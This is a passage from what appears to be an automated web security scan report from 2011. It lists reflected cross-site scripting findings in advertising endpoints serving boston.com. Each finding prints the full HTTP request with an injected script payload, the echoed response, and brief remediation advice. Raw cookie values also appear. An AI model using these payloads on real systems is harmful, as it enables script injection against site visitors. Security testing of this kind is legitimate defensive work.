Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:41 GMT
Content-Length: 7281
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10120332704_1311108281","http://ad.doubleclick.net/adj/q1.q.boston/be_bus57876'-alert(1)-'7b7238e5418;net=q1;u=,q1-10120332704_1311108281,11fda490648f83c,jobs,q1.ent_h-q1.jobs_h;;cmw=owl;sz=160x600;net=q1;ord1=317259;contx=jobs;dc=w;btg=q1.ent_h;btg=q1.jobs_h;ord=1807584008?","160","600",false);</scr'
...[SNIP]...

4.18. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_bus

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4493a'-alert(1)-'db01ffce823 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.boston/be_bus;sz=4493a'-alert(1)-'db01ffce823 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7263
Date: Tue, 19 Jul 2011 20:44:31 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
CollectiveMedia.createAndAttachAd("q1-10101739410_1311108271","http://ad.doubleclick.net/adj/q1.q.boston/be_bus;net=q1;u=,q1-10101739410_1311108271,11fda490648f83c,none,q1.ent_h-q1.jobs_h;;cmw=nurl;sz=4493a'-alert(1)-'db01ffce823;contx=none;dc=w;btg=q1.ent_h;btg=q1.jobs_h?","4493a'-alert(1)-'db01ffce823","",false);</scr'+'ipt>
...[SNIP]...

4.19. http://a.collective-media.net/cmadj/q1.q.boston/be_home [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_home

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a78b9'-alert(1)-'fd7d7acbe2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadja78b9'-alert(1)-'fd7d7acbe2c/q1.q.boston/be_home;sz=728x90;net=q1;ord=84105094;ord1=58867;cmpgurl=http%253A//boston.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7668
Date: Tue, 19 Jul 2011 20:42:43 GMT
Connection: close
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:43 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:43 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:43 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:43 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10114459464_1311108163","http://ad.doubleclick.net/adja78b9'-alert(1)-'fd7d7acbe2c/q1.q.boston/be_home;net=q1;u=,q1-10114459464_1311108163,11fda490648f83c,ent,q1.ent_h;;cmw=owl;sz=728x90;net=q1;ord1=58867;contx=ent;dc=w;btg=q1.ent_h;ord=84105094?","728","90",false);</scr'+'ipt>
...[SNIP]...

4.20. http://a.collective-media.net/cmadj/q1.q.boston/be_home [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af700'-alert(1)-'6bc1ce727e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.bostonaf700'-alert(1)-'6bc1ce727e7/be_home;sz=728x90;net=q1;ord=84105094;ord1=58867;cmpgurl=http%253A//boston.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:42:44 GMT
Content-Length: 7668
Connection: close
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10322274056_1311108164","http://ad.doubleclick.net/adj/q1.q.bostonaf700'-alert(1)-'6bc1ce727e7/be_home;net=q1;u=,q1-10322274056_1311108164,11fda490648f83c,ent,q1.ent_h;;cmw=owl;sz=728x90;net=q1;ord1=58867;contx=ent;dc=w;btg=q1.ent_h;ord=84105094?","728","90",false);</scr'+'ipt>
...[SNIP]...

4.21. http://a.collective-media.net/cmadj/q1.q.boston/be_home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a6a7'-alert(1)-'89308257669 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.boston/be_home5a6a7'-alert(1)-'89308257669;sz=728x90;net=q1;ord=84105094;ord1=58867;cmpgurl=http%253A//boston.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:42:44 GMT
Content-Length: 7668
Connection: close
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:44 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10109802729_1311108164","http://ad.doubleclick.net/adj/q1.q.boston/be_home5a6a7'-alert(1)-'89308257669;net=q1;u=,q1-10109802729_1311108164,11fda490648f83c,ent,q1.ent_h;;cmw=owl;sz=728x90;net=q1;ord1=58867;contx=ent;dc=w;btg=q1.ent_h;ord=84105094?","728","90",false);</scr'+'ipt>
...[SNIP]...

4.22. http://a.collective-media.net/cmadj/q1.q.boston/be_home [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_home

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71f18'-alert(1)-'d3edc27fb23 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.boston/be_home;sz=71f18'-alert(1)-'d3edc27fb23 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7657
Date: Tue, 19 Jul 2011 20:42:38 GMT
Connection: close
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
ascript">CollectiveMedia.createAndAttachAd("q1-10223658430_1311108158","http://ad.doubleclick.net/adj/q1.q.boston/be_home;net=q1;u=,q1-10223658430_1311108158,11fda490648f83c,none,q1.ent_l;;cmw=nurl;sz=71f18'-alert(1)-'d3edc27fb23;contx=none;dc=w;btg=q1.ent_l?","71f18'-alert(1)-'d3edc27fb23","",false);</scr'+'ipt>
...[SNIP]...

4.23. http://a.collective-media.net/cmadj/q1.q.boston/bus [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/bus

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ace44'-alert(1)-'493b799af02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjace44'-alert(1)-'493b799af02/q1.q.boston/bus;sz=300x250;net=q1;ord=927603973;ord1=555040;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:23 GMT
Content-Length: 7277
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10113876922_1311108263","http://ad.doubleclick.net/adjace44'-alert(1)-'493b799af02/q1.q.boston/bus;net=q1;u=,q1-10113876922_1311108263,11fda490648f83c,jobs,q1.ent_h-q1.jobs_h;;cmw=owl;sz=300x250;net=q1;ord1=555040;contx=jobs;dc=w;btg=q1.ent_h;btg=q1.jobs_h;ord=927603973?","300","250
...[SNIP]...

4.24. http://a.collective-media.net/cmadj/q1.q.boston/bus [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/bus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc30'-alert(1)-'57aa03fe9c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.bostonccc30'-alert(1)-'57aa03fe9c8/bus;sz=300x250;net=q1;ord=927603973;ord1=555040;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7277
Date: Tue, 19 Jul 2011 20:44:24 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10104673820_1311108264","http://ad.doubleclick.net/adj/q1.q.bostonccc30'-alert(1)-'57aa03fe9c8/bus;net=q1;u=,q1-10104673820_1311108264,11fda490648f83c,jobs,q1.ent_h-q1.jobs_h;;cmw=owl;sz=300x250;net=q1;ord1=555040;contx=jobs;dc=w;btg=q1.ent_h;btg=q1.jobs_h;ord=927603973?","300","250",false);</s
...[SNIP]...

4.25. http://a.collective-media.net/cmadj/q1.q.boston/bus [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/bus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e984'-alert(1)-'dd44c7ae98c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.boston/bus7e984'-alert(1)-'dd44c7ae98c;sz=300x250;net=q1;ord=927603973;ord1=555040;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:25 GMT
Content-Length: 7277
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10214352090_1311108265","http://ad.doubleclick.net/adj/q1.q.boston/bus7e984'-alert(1)-'dd44c7ae98c;net=q1;u=,q1-10214352090_1311108265,11fda490648f83c,jobs,q1.ent_h-q1.jobs_h;;cmw=owl;sz=300x250;net=q1;ord1=555040;contx=jobs;dc=w;btg=q1.ent_h;btg=q1.jobs_h;ord=927603973?","300","250",false);</scr'+
...[SNIP]...

4.26. http://a.collective-media.net/cmadj/q1.q.boston/bus [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/bus

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0227'-alert(1)-'538d0f0dee5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.boston/bus;sz=f0227'-alert(1)-'538d0f0dee5 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83c; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:16 GMT
Content-Length: 7260
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
t">CollectiveMedia.createAndAttachAd("q1-10120728141_1311108256","http://ad.doubleclick.net/adj/q1.q.boston/bus;net=q1;u=,q1-10120728141_1311108256,11fda490648f83c,none,q1.ent_h-q1.jobs_l;;cmw=nurl;sz=f0227'-alert(1)-'538d0f0dee5;contx=none;dc=w;btg=q1.ent_h;btg=q1.jobs_l?","f0227'-alert(1)-'538d0f0dee5","",false);</scr'+'ipt>
...[SNIP]...

4.27. http://a.netmng.com/hic/ [passback&click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The value of the passback&click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d54"><script>alert(1)</script>747b9ccc342 was submitted in the passback&click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=a9d54"><script>alert(1)</script>747b9ccc342 HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: evo5=wvx6pjzfr7r98%7C%2BnlYsmJbcvmMSIPYbjpC3rVf%2FNXK2pDRLlRQneamR0oY2ufelEARbwlFtAli1twVl67GERkQH1BEyJNfQDCAdW8bJJdwGx%2Bx72u6pRXTwANi6Beus76iSaXBQUCKCnoC0snFuoKsJ5qzJpcDMpx2qcBLog2crxkNjhDFFeEXeATdugS90Jmwiok8RT92i9jRN8yrc1W%2BTcJlzzZBQEEpSL0cBUfs%2FHHXs4XROwTC0YVkHeLVo6j8KalEDz%2FmML3ZPxXEsB6%2BHKAcIO9w6myx2yR5jOkwPmNq1XcUWhjbIlllZncpvd%2BC56omuRGr2X58mMqdyED%2BsBW%2Fj7YUs49CFmstloWVGep%2FjIyglCaCd8FLmA%2F7gYIqTaQ0MX8eMvZO8KS5x1j9LMUlOBdPLH4CeMKOVQIXgtOnt%2FZCG4sbAZVPMV6105R51Zms%2Fd2tRWIj3ZY3%2BnSbpCVlc%2Bsepj2%2Fh7UVOg6Al77Hmgv2rEFVSze45VB54DME%2BSmVDIN%2BhDpD

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:49:21 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sun, 17 Jul 2011 20:49:21 GMT
Last-Modified: Sun, 17 Jul 2011 20:49:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_ii=AhgqIBD6nIi0D%2BMn34ymEiZLn5OZjtoxsqxCpcC5vQgm7GZTqlc5I2oXIuUgwnU4n2plP0K0puUNNwYhuG8H75jYP1ISWL0c90Oo43tzCoLoVfrrYmwx26HZxEDcjtYQCmlA5hdBUSrdJ9%2FUHM%2B85SzRXd9lorqlEVBuXGeuwdY%3D; expires=Wed, 18-Jan-2012 20:49:21 GMT; path=/
Set-Cookie: evo5_display=6ybBSHUW4qFeA2pi6k6gGjq6S86HctbWeh9cZbJhLk43cYePIOB4VQ2mX5Rf5PzdDBRAx9n6ayvu1Tyzf7hzrQ%3D%3D; expires=Thu, 23-Jun-44591 20:49:21 GMT; path=/; domain=.netmng.com
Content-Length: 1592
Connection: close
